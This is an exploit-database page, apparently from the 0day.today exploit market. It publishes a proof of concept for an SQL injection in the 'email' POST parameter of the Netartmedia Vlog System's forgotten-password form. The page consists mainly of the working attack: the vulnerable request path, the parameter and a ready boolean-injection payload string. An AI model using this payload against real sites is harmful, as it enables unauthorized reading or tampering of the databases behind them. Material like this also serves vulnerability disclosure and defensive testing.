[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Netartmedia Vlog System - email SQL Injection Vulnerability

Author
Ahmet Ümit BAYRAM
Risk
[
Security Risk High
]
0day-ID
0day-ID-32399
Category
web applications
Date add
20-03-2019
Platform
php
# Exploit Title: Netartmedia Vlog System - 'email' SQL Injection
# Exploit Author: Ahmet Ümit BAYRAM
# Vendor Homepage: https://www.netartmedia.net/vlogsystem/
# Demo Site: https://www.phpscriptdemos.com/vlogs/
# Version: Lastest
# Tested on: Kali Linux
# CVE: N/A
----- PoC: SQLi -----
# Request: http://localhost/[PATH]/index.php
# Vulnerable Parameter: email (POST)
# Attack
Pattern: ProceedSend=1&email=-1'%20OR%203*2*1=6%20AND%20000371=000371%20--%20&mod=forgotten_password

#  0day.today [2024-11-16]  #